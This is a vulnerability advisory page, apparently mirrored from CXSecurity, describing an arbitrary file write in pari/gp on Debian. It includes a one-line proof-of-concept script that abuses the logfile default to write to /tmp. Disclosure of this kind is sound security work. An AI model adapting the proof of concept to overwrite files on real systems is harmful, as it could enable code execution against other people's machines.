pari/gp 2.x Arbitrary File Overwrite - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1838013 漏洞类型
发布时间 2019-11-27 更新时间 2019-11-27
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019110168
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
pari/gp on debian stable allow arbitrary file write

pari/gp is CAS (computer algebra system).
pari/gp version 2.9.1 on debian stretch and 2.11 on debian buster
allow arbitrary file write and hence arbitrary code execution.

poc:
========
\\ a.gp
\\ to run: \r a.gp
default("logfile","/tmp/a.txt");default("log",1);print("log(1)");
========

Of mathematical interest is pari was missing solutions
to Thue equations when assuming GRH (the fix changed polynomial
bound to exponential bound):
http://pari.math.u-bordeaux.fr/archives/pari-dev-1207/msg00000.html
t=thue(thueinit(x^3+92*x+1,0),3^3);t

-- 
CV:    https://j.ludost.net/resumegg.pdf
site:  http://www.guninski.com
blog:  https://j.ludost.net/blog